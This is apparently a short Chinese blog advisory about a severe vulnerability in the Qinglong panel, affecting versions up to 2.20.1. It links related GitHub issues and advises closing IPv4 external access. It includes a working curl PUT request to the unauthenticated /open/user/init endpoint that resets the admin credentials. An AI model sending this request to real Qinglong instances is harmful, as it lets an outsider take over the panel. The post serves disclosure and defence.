青龙存在严重漏洞,影响到所有版本(最新 2.20.1 也存在)
相关漏洞报告:
https://github.com/whyour/qinglong/issues/2923
https://github.com/whyour/qinglong/issues/2933
https://github.com/whyour/qinglong/issues/2934
初始化用户接口可以被任意调用,具体请求如下:
curl -X PUT 'http://10.10.10.123:5700/open/user/init' -H 'Content-Type: application/json' -d '{
"username": "admin",
"password": "adminadmin"
}'一些话
- 如果你对外用的是ipv6,问题不大,一般扫不到
- 如果你对外用的是ipv4,建议直接关闭外网端口访问
版权属于:zgcwkj
本文链接:https://zgcwkj.cn/archives/272.html
转载声明:请注明本文章的标题及内容的出处和声明,谢谢